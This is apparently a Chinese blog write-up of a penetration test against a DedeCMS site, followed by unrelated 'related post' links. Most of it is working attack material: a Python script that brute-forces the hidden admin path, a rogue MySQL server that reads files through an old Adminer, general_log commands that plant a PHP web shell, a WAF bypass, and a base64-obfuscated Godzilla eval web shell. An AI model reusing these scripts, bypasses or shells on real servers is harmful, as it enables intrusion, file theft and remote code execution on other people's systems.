记一次偶遇Adminer

又是无聊的一天打开高危扫描器开扫，结果啥也没扫出来，然后就开始苦逼的一个一个站看了。然后发现下面这个站dedecms，服务器windows

各种历史洞打了一遍都没用，因为是windows可以用这个跑下后台

import requests
import itertools
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
url = "http://www.test.com/tags.php"
data = {"_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif","_FILES[mochazz][name]" : 0,"_FILES[mochazz][size]" : 0,"_FILES[mochazz][type]" : "image/gif"
}for num in range(1,7):if flag:breakfor pre in itertools.permutations(characters,num):pre = ''.join(list(pre))data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)print("testing",pre)r = requests.post(url,data=data)if "Upload filetype not allow !" not in r.text and r.status_code == 200:flag = 1back_dir = predata["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"breakelse:data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print("[+] 前缀为：",back_dir)
flag = 0
for i in range(30):if flag:breakfor ch in characters:if ch == characters[-1]:flag = 1breakdata["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)r = requests.post(url, data=data)if "Upload filetype not allow !" not in r.text and r.status_code == 200:back_dir += chprint("[+] ",back_dir)data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"breakelse:data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"print("后台地址为：",back_dir)

结果跑完居然是dede，这就扯了我访问dede是404.

如果找到后台的话还可以用这个洞猜一下管理员账号：
http://www.yulegeyu.com/2018/09/20/dedecms-guess-admin-username-trick/
山穷水尽了随手试了一下adminer.php居然存在（扫描器里有adminer.php的估计扫的目录太多了被封ip了所以不要相信扫描器）

adminer低版本可以利用mysql服务端恶意读取客户端文件

mysql_client.py代码

#coding=utf-8
import socket
import logging
import sys
logging.basicConfig(level=logging.DEBUG)filename=sys.argv[1]
sv=socket.socket()
sv.setsockopt(1,2,1)
sv.bind(("",3306))
sv.listen(5)
conn,address=sv.accept()
logging.info('Conn from: %r', address)
conn.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
conn.recv(9999)
logging.info("auth okay")
conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
conn.recv(9999)
logging.info("want file...")
wantfile=chr(len(filename)+1)+"\x00\x00\x01\xFB"+filename
conn.sendall(wantfile)
content=conn.recv(9999)
logging.info(content)
conn.close()

使用方法直接服务器执行
python mysql_client.py "F:\dede\index.php"
然后adminer填你服务器地址，账号密码随便填连接就读到了文件，服务器3306端口要对外开放
然后就是又开始读文件了，先随意读一下，让它报出web路径来

因为是dedecms所以直接读 data\common.inc.php

文件不存在？直接放F盘下读一下

发现账号为root，直接登录adminer.php通过日志getshell

set global general_log=on 开启general log模式set global general_log_file='F:\\*****\\shell.php'; 设置日志路径select '<?php eval($_POST['pwd']);?>'; 写shell毫无疑问最后这里被拦了，抓个包来测吧，select '<?php '不拦

select+'<?php+phpinfo();+?>'拦掉

使用注释换行绕过select+'<?php+//%0Aphpinfo();+?>'

写个哥斯拉的马

select '<?php //"%0A$a="ICAgIHNlc3Npb25fc3RhcnQoKTsKICAgIEBzZXRfdGltZV9saW1pdCgwKTsKCUBlcnJvcl9yZXBvcnRpbmcoMCk7CiAgICBmdW5jdGlvbiBFKCRELCRLKXsKICAgICAgICBmb3IoJGk9MDskaTxzdHJsZW4oJEQpOyRpKyspIHsKICAgICAgICAgICAgJERbJGldID0gJERbJGldXiRLWyRpKzEmMTVdOwogICAgICAgIH0KICAgICAgICByZXR1cm4gJEQ7CiAgICB9CiAgICBmdW5jdGlvbiBRKCREKXsKICAgICAgICByZXR1cm4gYmFzZTY0X2VuY29kZSgkRCk7CiAgICB9CiAgICBmdW5jdGlvbiBPKCREKXsKICAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgkRCk7CiAgICB9CiAgICAkUD0nd2hvYW1pJzsKICAgICRWPSdwYXlsb2FkJzsKICAgICRUPScxYjA2NzliZTcyYWQ5NzZhJzsKICAgIGlmIChpc3NldCgkX1BPU1RbJFBdKSl7CiAgICAgICAgJEY9TyhFKE8oJF9QT1NUWyRQXSksJFQpKTsKICAgICAgICBpZiAoaXNzZXQoJF9TRVNTSU9OWyRWXSkpewogICAgICAgICAgICAkTD0kX1NFU1NJT05bJFZdOwogICAgICAgICAgICAkQT1leHBsb2RlKCd8JywkTCk7CiAgICAgICAgICAgIGNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIG52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgICAgICAgICAgJFI9bmV3IEMoKTsKCQkJJFItPm52b2tlKCRBWzBdKTsKICAgICAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRQLiRUKSwwLDE2KTsKICAgICAgICAgICAgZWNobyBRKEUoQHJ1bigkRiksJFQpKTsKICAgICAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRQLiRUKSwxNik7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICRfU0VTU0lPTlskVl09JEY7CiAgICAgICAgfQogICAgfQ==";eval%01(base64_decode%01($a));//"; ?>'

成功连上，system

记一次偶遇Adminer相关推荐

生活随记 - 食堂偶遇的两个小伙伴
去楼下中餐馆吃饭,那了餐具打好饭,餐厅生意挺好,没有单独的空餐桌了,看到一个圆桌上有2个空位,我就坐下了,同桌的是2个小伙子(暂时称呼为a和b),穿找外卖套装,估计是中午休息时间赶着吃点饭.有一个小伙 ...
频发：记ADG备库日志应用延迟的一次故障处理-云和恩墨技术通讯精选
各位亲爱的用户/读者朋友们: 为了及时共享行业案例,通告共性问题,达成知识共享和提前预防,我们整理和编辑了<云和恩墨技术通讯>(7月刊),通过对过去一段时间的知识回顾和故障归纳,以期提供有 ...
把生命放在美丽的焦距上——记桂林、阳朔、龙胜之旅
把生命放在美丽的焦距上--记桂林.阳朔.龙胜之旅题记: 冷于陂水淡于秋,远陌初穷到渡头. 赖是丹青不能画,画成应遣一生愁. --宋.司马池<行色> 一暗恋情节有的地方,一生也许只 ...
北海屠龙记------十二
石破天惊入手证奇缘玉钩宛在神潜守固誓心聆好语苓兔皈依赵霖.王谨正立崖下,闻得呼声惊顾,瞥见对崖似在摇动,耳听山石碎裂之声,不禁大惊,忙纵遁光,往谷外飞去.身刚离地,那长达二里的百丈高崖已经 ...
Flag壁纸生成器诞生记
某天,有条咸鱼意识到需要改变一下生活习惯,使用记事本记了一段小目标,疯狂找小型工具把图片做成壁纸,形式主义地鞭策自己. Flag 壁纸生成器的点子,源自某次的间歇性踌躇满志.下文中,以小F ...
[转]北邮生两月的赶集生活，记我在的赶集网工作的两月
转自北邮论坛发信人: Caolixiang (慕慕珍珍), 信区: WorkLife 标题: 我在赶集网的两个月 7.4(完结) 发信站: 北邮人论坛 (Fri Jun 24 23:44:42 2 ...
[日常] NOIWC2019 冬眠记
NOIWC 2019 冬眠记辣鸡rvalue天天写意识流流水账 Day 0 早上没有跑操(极度舒服.png) 和春哥在博客颓图的时候突然被来送笔电的老爹查水表(捂脸) 母上大人骗我说这功能机不能放存 ...
NOIP2018酱油记
第一次写酱油记好激动哦- Day -365 一年前的 NOIP2017 我爆零了QWQ 但是人家只会 DFS,能指望个啥嘛- Day -10 今天打 slay.one 的时候偶遇 WGSZ 的 Edg ...
WC酱油记——博客一个月没更新留念
不知不觉一月就这么过去了,估计二月也会很快的谜之消失吧.. 博客一直也没有更新,CF的题也是坑着一坨,考试考的我身败名裂然后还要去参加WC被虐... 总之一下就回忆一下我的WC日常吧..但是因为我是隔 ...

记一次偶遇Adminer

记一次偶遇Adminer相关推荐

最新文章

热门文章